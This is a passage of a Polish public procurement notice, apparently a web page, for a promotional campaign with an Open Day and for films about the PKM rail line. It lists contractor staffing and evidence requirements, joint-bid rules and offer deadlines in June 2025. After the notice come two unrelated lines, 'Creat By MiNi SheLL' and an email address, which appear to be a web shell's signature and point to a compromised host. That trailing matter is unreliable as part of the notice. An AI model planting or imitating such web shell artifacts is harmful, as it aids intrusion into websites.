każde.<br/>Uwaga:<br/>i.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, w/w warunek udziału w postępowaniu może zostać spełniony łącznie przez wykonawców, którzy zrealizują usługi, do realizacji których te zdolności są wymagane, z zastrzeżeniem, że warunek w poszczególnym danym punkcie (każdym punkcie), tj. 1) i 2), musi spełniać w całości co najmniej jeden z tych Wykonawców;<br/>ii.W przypadku polegania przez Wykonawcę na zdolnościach podmiotu udostępniającego zasoby, w myśl art. 118 ustawy Pzp, warunek w poszczególnym danym punkcie (każdym punkcie), tj. 1) i 2) musi spełniać w całości podmiot udostępniający zasoby.<br/>oraz<br/>2. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że będzie dysponował co najmniej czterema (4) osobami, które będą brały udział w realizacji zamówienia z których:<br/>1)co najmniej jedna (1) osoba, w okresie ostatnich 3 lat przed upływem terminu składania ofert, była odpowiedzialna za realizację ujęć filmowych w ramach promocji wydarzenia;<br/>2)co najmniej jedna (1) osoba, w okresie ostatnich 3 lat przed upływem terminu składania ofert, była odpowiedzialna za realizację ujęć filmowych dronem i posiada uprawnienia do wykonywania lotów bezzałogowymi statkami powietrznymi w kategorii szczególnej;<br/>3)co najmniej jedna (1) osoba, w okresie ostatnich 3 lat przed upływem terminu składania ofert, była odpowiedzialna za przeprowadzenie warsztatów fotografii i przynajmniej podstawowej postprodukcji zdjęć;<br/>4)co najmniej jedna (1) osoba, w okresie ostatnich 3 lat przed upływem terminu składania ofert, była odpowiedzialna za montaż i postprodukcję materiałów wideo na potrzeby promocji wydarzenia.<br/>Uwaga:<br/>i.Zamawiający dopuszcza, aby jedna osoba pełniła więcej niż jedną funkcję, o ile spełnia wymagania stawiane osobom przewidzianym do pełnienia tych funkcji.<br/>ii.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia w/w warunek udziału w postępowaniu może zostać spełniony łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.wykaz usług, wykonanych nie wcześniej niż w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, wartości, dat wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów potwierdzających, że usługi te zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy - wg załączonego wzoru - Załącznik nr 4 do SWZ;<br/>Uwaga:<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonanych wspólnie z innymi Wykonawcami, powyższy wykaz dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>2.wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia oraz informacją o podstawie do dysponowania tymi osobami - wg załączonego wzoru - Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykonawca zobowiązany jest złożyć wraz z ofertą, jako przedmiotowy środek dowodowy oraz w celu przyznania punktów w ramach kryterium oceny ofert, które zostały określone w Rozdziale XVI SWZ:<br/><br/>W ramach Części 1 - Wstępną koncepcję kampanii promocyjnej i organizacji Dnia Otwartego, jako załącznik nr Załącznik nr 2 do Oferty dla Części nr 1.<br/>Wymagania wobec zakresu tego dokumentu Zamawiający szczegółowo opisane zostały w Rozdziale XVI SWZ. <br/>Wstępna koncepcja kampanii promocyjnej i organizacji Dnia Otwartego w szczególności zawierać powinna:<br/>a)	Proponowany Scenariusz Dnia Otwartego - wg wzoru stanowiącego Załącznik nr 2 do Oferty;<br/>b)	Projekty proponowanej oprawy graficznej Wydarzenia, w zakresie opisanym w Rozdziale XVI.<br/><br/>W ramach Części 2 - Proponowany Scenariusz produkcji filmów, jako Załącznik nr 2 do oferty dla Części nr 2.<br/>Scenariusz filmu podsumowującego 10 lat funkcjonowania linii PKM oraz scenariusz nowego filmu prezentującego PKM szczególności zawierać powinny:<br/>a)	Plan ujęć i dokładny opis każdego ujęcia w formie opisu czasowego,<br/>b)	Skrypt tekstu zawartego w filmie i/lub nagranego jako „voice over”.<br/><br/>Uwaga!<br/>a.	Wymagania dot. sposobu sporządzenia oraz zawartości powyższych dokumentów określone zostały w Rozdziale XVI SWZ. <br/>b.	Zamawiający informuje, iż dokumenty, o których mowa powyżej, muszą potwierdzać zgodność oferowanego przez Wykonawcę Przedmiotu zamówienia z wymaganiami Zamawiającego postawionymi w OPZ i SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, Zamawiający żąda złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru.<br/>1.Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa powyżej, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskaże dane umożliwiające dostęp do tych dokumentów. <br/>2.W przypadku Wykonawców krajowych, figurujących w Krajowym Rejestrze Sądowym lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej Zamawiający samodzielnie pobierze odpis lub informację.<br/>3.Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa powyżej, Zamawiający żąda od Wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	W przypadku, o którym mowa powyżej, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być dołączone do oferty. <br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym mowa w Rozdziale VI ust. 1 niniejszej SWZ, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać spełnianie warunków udziału w postępowaniu (jeżeli dotyczy), brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4.	Wykonawcy, o których mowa powyżej, ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>5.	Oferta musi być podpisana w taki sposób, by wiązała wszystkich wykonawców występujących wspólnie.<br/>6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie (art. 117 ust. 4 uPzp), z którego wynika, które usługi wykonają poszczególni wykonawcy – Załącznik nr 1d do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> określono w Załączniku nr 3 do SWZ - Projektowane postanowienia umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy na stronie: https://platformazakupowa.pl/transakcja/1111206</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-05 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zamówienie podzielone zostało na 2 na części. Zamawiający dopuszcza możliwość składania ofert częściowych, a Wykonawca może złożyć ofertę na dowolną liczbę części. Wykonawca może złożyć tylko jedną ofertę, zgodnie z postanowieniami SWZ, w odniesieniu do Części nr 1 oraz do Części nr 2. <br/>2.	Oferta winna być sporządzona w języku polskim pod rygorem nieważności.<br/>3.	Ofertę składa się, pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4.	Treść oferty musi odpowiadać treści SWZ .<br/>5.	Na ofertę składa się „Formularz oferty” zgodny ze wzorem stanowiącym załącznik nr 1 do SWZ, a także:<br/>6.	Wraz z ofertą Wykonawca zobowiązany jest złożyć za pośrednictwem Platformy:<br/>1)	wypełnione wstępne oświadczenie o spełnianiu warunków udziału w postępowaniu oraz braku podstaw wykluczenia - Załącznik nr 1 do oferty;<br/>2)	Jeżeli dotyczy - Oświadczenie podmiotu zobowiązującego się do udostępnienia zasobów – Załącznik nr 1a do oferty;<br/>3)	Jeżeli dotyczy - Zobowiązanie do udostępnienia zasobów – według wzoru - Załącznik nr 1b do oferty;<br/>4)	Jeżeli dotyczy – Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia – według wzoru – Załącznik nr 1c do oferty.<br/>5)	Przedmiotowe środki dowodowe, tj. dokumenty, o których mowa w Rozdziale III SWZ, <br/>w zakresie Części, na którą Wykonawca składa ofertę;<br/>6)	odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, chyba, że Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, a Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów – w odniesieniu do Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia jak również podmiotu udostępniającego zasoby; <br/>7)	ewentualne pełnomocnictwa lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy lub Wykonawców wspólnie ubiegających się o udzielenie zamówienia, lub podmiotu udostępniającego zasoby (jeżeli w imieniu Wykonawcy lub Wykonawców wspólnie ubiegających się o udzielenie zamówienia, reprezentowania nie wynika z dokumentów, o których mowa w pkt 6.<br/>8)	wszelkie inne oświadczenia i dokumenty wskazane w SWZ jako wymagane do złożenia wraz z ofertą.<br/>7.Wykonawcy w toku postępowania o udzielenie zamówienia przysługują środki ochrony prawnej określone w Dziale IX art. 505-590 ustawy Pzp.<br/>8.Oświadczenie, o którym mowa w art. 125 ust. 1 zawiera również przesłanki wykluczenia z postępowania dot.:<br/>- nie podleganiu wykluczeniu z postępowania na podstawie art. 108 ust. 1 pkt 1-6 Pzp<br/>- nie zachodzenia przesłanki wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>Zamawiający będzie weryfikował przesłankę wykluczenia, o której mowa powyżej na podstawie:<br/>-Wykazów określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014;<br/>-Listy Ministra właściwego do spraw wewnętrznych obejmującej osoby i podmioty, wobec których są stosowane środki, o których mowa w art. 1 ustawy sankcyjnej.

Creat By MiNi SheLL
Email: jattceo@gmail.com